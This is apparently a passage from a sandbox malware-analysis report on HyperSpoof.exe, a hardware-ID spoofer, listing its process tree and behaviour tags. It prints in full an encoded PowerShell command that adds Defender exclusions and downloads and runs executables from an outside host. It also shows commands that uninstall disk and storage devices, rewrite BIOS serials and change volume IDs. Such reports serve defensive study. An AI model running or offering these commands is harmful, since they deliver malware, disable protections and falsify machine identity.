cmd.exe 36 PID 2592 wrote to memory of 584 2592 sphyperRuntimedhcpSvc.exe 37 PID 2592 wrote to memory of 584 2592 sphyperRuntimedhcpSvc.exe 37 PID 2592 wrote to memory of 584 2592 sphyperRuntimedhcpSvc.exe 37 PID 2592 wrote to memory of 584 2592 sphyperRuntimedhcpSvc.exe 37 PID 2220 wrote to memory of 2212 2220 conhostsft.exe 38 PID 2220 wrote to memory of 2212 2220 conhostsft.exe 38 PID 2220 wrote to memory of 2212 2220 conhostsft.exe 38 PID 2220 wrote to memory of 2212 2220 conhostsft.exe 38 PID 1608 wrote to memory of 1284 1608 HpsrSpoof.exe 39 PID 1608 wrote to memory of 1284 1608 HpsrSpoof.exe 39 PID 1608 wrote to memory of 1284 1608 HpsrSpoof.exe 39 PID 1284 wrote to memory of 2368 1284 cmd.exe 41 PID 1284 wrote to memory of 2368 1284 cmd.exe 41 PID 1284 wrote to memory of 2368 1284 cmd.exe 41 PID 1284 wrote to memory of 2956 1284 cmd.exe 42 PID 1284 wrote to memory of 2956 1284 cmd.exe 42 PID 1284 wrote to memory of 2956 1284 cmd.exe 42 PID 1284 wrote to memory of 2268 1284 cmd.exe 43 PID 1284 wrote to memory of 2268 1284 cmd.exe 43 PID 1284 wrote to memory of 2268 1284 cmd.exe 43 PID 1284 wrote to memory of 2276 1284 cmd.exe 44 PID 1284 wrote to memory of 2276 1284 cmd.exe 44 PID 1284 wrote to memory of 2276 1284 cmd.exe 44 PID 1284 wrote to memory of 1684 1284 cmd.exe 45 PID 1284 wrote to memory of 1684 1284 cmd.exe 45 PID 1284 wrote to memory of 1684 1284 cmd.exe 45 PID 1284 wrote to memory of 2892 1284 cmd.exe 46 PID 1284 wrote to memory of 2892 1284 cmd.exe 46 PID 1284 wrote to memory of 2892 1284 cmd.exe 46 PID 1284 wrote to memory of 2320 1284 cmd.exe 47 PID 1284 wrote to memory of 2320 1284 cmd.exe 47 PID 1284 wrote to memory of 2320 1284 cmd.exe 47 PID 1284 wrote to memory of 576 1284 cmd.exe 48 PID 1284 wrote to memory of 576 1284 cmd.exe 48 PID 1284 wrote to memory of 576 1284 cmd.exe 48 PID 1284 wrote to memory of 572 1284 cmd.exe 49 PID 1284 wrote to memory of 572 1284 cmd.exe 49 PID 1284 wrote to memory of 572 1284 cmd.exe 49 PID 1284 wrote to memory of 3028 1284 cmd.exe 50 PID 1284 wrote to memory of 3028 1284 cmd.exe 50 PID 1284 wrote to memory of 3028 1284 cmd.exe 50 PID 1284 wrote to memory of 2836 1284 cmd.exe 51 PID 1284 wrote to memory of 2836 1284 cmd.exe 51 PID 1284 wrote to memory of 2836 1284 cmd.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB5⤵
- Executes dropped EXE
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:276
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB4⤵
- Loads dropped DLL
PID:1588 -
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13721HP-TRGT24587AB5⤵
- Executes dropped EXE
PID:2028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV4⤵PID:2664
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213724HP-TRGT2567RV5⤵
- Executes dropped EXE
PID:2676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG4⤵PID:2252
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813724HP-TRGT2567SG5⤵
- Executes dropped EXE
PID:1656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto4⤵PID:1040
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto5⤵
- Executes dropped EXE
PID:548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL4⤵PID:2804
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513724HP-TRGT2567SL5⤵
- Executes dropped EXE
PID:536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA4⤵PID:788
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413724HP-TRGT2567FA5⤵
- Executes dropped EXE
PID:1044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU4⤵PID:2272
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613724HP-TRGT2567FU5⤵
- Executes dropped EXE
PID:1696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ4⤵PID:844
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313724HP-TRGT2567DQ5⤵
- Executes dropped EXE
PID:1444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST4⤵PID:1340
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713724HP-TRGT2567MST5⤵
- Executes dropped EXE
PID:1816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF4⤵PID:1764
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF5⤵
- Executes dropped EXE
PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB4⤵PID:1708
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13743HP-TRGT1522AB5⤵
- Executes dropped EXE
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV4⤵PID:1516
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV5⤵
- Executes dropped EXE
PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG4⤵PID:1580
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG5⤵
- Executes dropped EXE
PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto4⤵PID:1564
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto5⤵
- Executes dropped EXE
PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL4⤵PID:1700
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL5⤵
- Executes dropped EXE
PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA4⤵PID:2656
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413743HP-TRGT1522FA5⤵
- Executes dropped EXE
PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU4⤵PID:2820
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613743HP-TRGT1522FU5⤵
- Executes dropped EXE
PID:1036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ4⤵PID:2576
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313743HP-TRGT1522DQ5⤵
- Executes dropped EXE
PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST4⤵PID:2676
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713743HP-TRGT1522MST5⤵
- Executes dropped EXE
PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF4⤵PID:2684
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF5⤵
- Executes dropped EXE
PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB4⤵PID:788
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13760HP-TRGT22496AB5⤵
- Executes dropped EXE
PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV4⤵PID:1572
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213760HP-TRGT22496RV5⤵
- Executes dropped EXE
PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG4⤵PID:844
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813760HP-TRGT22496SG5⤵
- Executes dropped EXE
PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto4⤵PID:1340
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto5⤵
- Executes dropped EXE
PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL4⤵PID:1652
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513760HP-TRGT22496SL5⤵
- Executes dropped EXE
PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA4⤵PID:556
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413760HP-TRGT22496FA5⤵
- Executes dropped EXE
PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU4⤵PID:1300
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613760HP-TRGT22496FU5⤵
- Executes dropped EXE
PID:1600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ4⤵PID:2372
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313760HP-TRGT22496DQ5⤵
- Executes dropped EXE
PID:2064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST4⤵PID:2156
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713760HP-TRGT22496MST5⤵
- Executes dropped EXE
PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF4⤵PID:900
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF5⤵
- Executes dropped EXE
PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA04⤵PID:2704
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA05⤵
- Executes dropped EXE
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A4⤵PID:1712
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A5⤵
- Executes dropped EXE
PID:1928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU4⤵PID:2220
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU5⤵
- Executes dropped EXE
PID:1640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD4⤵PID:2436
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD5⤵
- Executes dropped EXE
PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E34⤵PID:1796
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E35⤵
- Executes dropped EXE
PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE4⤵PID:1404
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE5⤵
- Executes dropped EXE
PID:2192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL44⤵PID:968
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL45⤵
- Executes dropped EXE
PID:1320
-
-
-
